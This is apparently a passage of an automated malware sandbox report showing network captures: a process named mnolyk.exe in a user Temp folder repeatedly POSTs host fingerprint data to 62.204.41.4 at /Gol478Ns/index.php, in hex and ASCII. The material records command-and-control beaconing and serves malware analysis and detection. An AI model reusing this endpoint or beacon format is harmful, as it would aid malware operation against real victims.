                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:16.814882994 CET598INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    399192.168.2.35010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:16.998377085 CET599OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.064486027 CET599INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.34970562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:10.447077036 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:10.509819984 CET205INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    40192.168.2.34974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:26.717820883 CET241OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:26.779829025 CET241INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    400192.168.2.35010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:17.234939098 CET600OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.299627066 CET600INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    401192.168.2.35010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:17.483711958 CET601OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.548576117 CET601INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    402192.168.2.35010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:17.766341925 CET602OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:17.830234051 CET602INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    403192.168.2.35010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:17.996325016 CET603OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.061194897 CET603INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    404192.168.2.35010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:18.237085104 CET604OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.299196005 CET604INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    405192.168.2.35010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:18.466114998 CET605OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.529956102 CET605INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    406192.168.2.35010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:18.709114075 CET606OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:18.770656109 CET606INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    407192.168.2.35011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:18.949775934 CET607OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.012985945 CET607INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    408192.168.2.35011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:19.185502052 CET608OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.249695063 CET608INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    409192.168.2.35011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:19.423662901 CET609OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.488576889 CET609INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    41192.168.2.34974362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:26.963196993 CET242OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:27.027477980 CET242INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    410192.168.2.35011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:19.670653105 CET610OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:19.733382940 CET610INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    411192.168.2.35011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:19.934148073 CET611OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.010862112 CET611INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:19 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    412192.168.2.35011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:20.219232082 CET612OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.285139084 CET612INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    413192.168.2.35011662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:20.457300901 CET613OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.523432016 CET613INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    414192.168.2.35011762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:20.704452038 CET614OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:20.767275095 CET614INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    415192.168.2.35011862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
